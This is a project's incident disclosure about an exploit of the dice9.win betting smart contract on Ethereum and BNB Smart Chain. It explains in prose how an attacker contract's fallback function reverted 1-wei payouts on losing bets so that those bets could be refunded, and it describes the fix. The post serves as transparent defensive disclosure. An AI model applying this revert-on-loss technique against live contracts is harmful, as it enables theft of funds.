This is a note with a few technical details about the incident our Smart Contract experienced on 26th of September, 2023.
We are posting all the details as a part of our responsible disclosure practices: we chose to expose any issue, security incident or other problem our platform faces as we strongly believe in building trust through absolute transparency.
An unknown attacker attempted to exploit our Smart Contract by submitting bets and rejecting the payment from all losing ones. This made dice9.win consider those bets as unprocessed, allowing the hacker to refund them later, ultimately banking the profit in a risk-free way.
The exploit employed by the attacker was actually pretty trivial: he crafted smart contracts (one for Ethereum mainnet, another one for Binance Smart Chain) that would place bets on dice9.win.
Whenever our Croupier bot was settling the bet, this smart contract was receiving the payment. One of the features of Smart Contracts on EVM is fallback payable functions – a special methods on Smart Contracts that get executed when funds are sent to the contract. The fallback function of attackers contract was simply checking if the payment is 1 wei (meaning that the bet was lost) and reverted the execution if that was the case.
<aside> ❓ Why does a lost bet trigger a payment? Our Smart Contract is designed in a way so that it always sends funds back to the player; just if the bet is lost, the funds amount sent is 1 wei – a negligibly small amount of funds to safely ignore it – and we always have a transaction on the blockchain, for all kinds of bets.
</aside>
Since we have deliberately designed the Smart Contract to ensure it is not possible for the House to take any of players’ funds, one of the checks that we have implemented is the requirement for the bet to be either fully processed or be kept “aside”, allowing the player to refund it in case our system goes down and no bets get revealed. Thus, accepting winning bets and rejecting failed bets made it so that any lost bet would be refundable after some time, ultimately leading to the exploit.
Luckily for us, stars aligned that day: first of all, our system monitoring noticed a significant amount of settle bet transactions started failing for no apparent reason. Secondly, a team of security researches SEAL 911 contacted us via support channels as they have noticed transactions against Tornado Cash with funds originating from our Smart Contract.
<aside> 🙏 Thank you, SEAL 911! We truly appreciate your efforts in making the ecosystem safer and more secure for everyone involved, and especially admire your disclosure practices – contacting our team so swiftly was a truly gentlemen’s deed.
</aside>
According to our internal procedures, we promptly stopped all the games and started the investigation. As it turned out, the issue was a pretty straightforward and we went straight to resolution.
The fix has been authored, reviewed, tested and deployed on the Ethereum mainnet and Binance Smart Chain in about 2 hours, and the website has been updated to utilize the fixed version of the Smart Contract.
The logic to stop that is very simple: we no longer allow bets to be made from a Smart Contract. As an additional precautionary measure, we also allowed the payment transfer to fail for the bets that lose – we simply ignore the error; of course, if the bet is won, the transaction is reverted just like it used to.
We did lose some funds, but the silver lining is that it was a comparatively low price to pay – a much larger portion of contract balance would be compromised if the attacker was sending bets faster, or we noticed the issue much later than we did. In the end, we only lost about 7% of our funds – that is painful, of course, but we already had players winning bigger chunks in absolutely legit games anyway.
Absolutely. The design of the Smart Contract does not allow anyone (including us) to take player’s funds out. The exploit was directed a us, not the other players.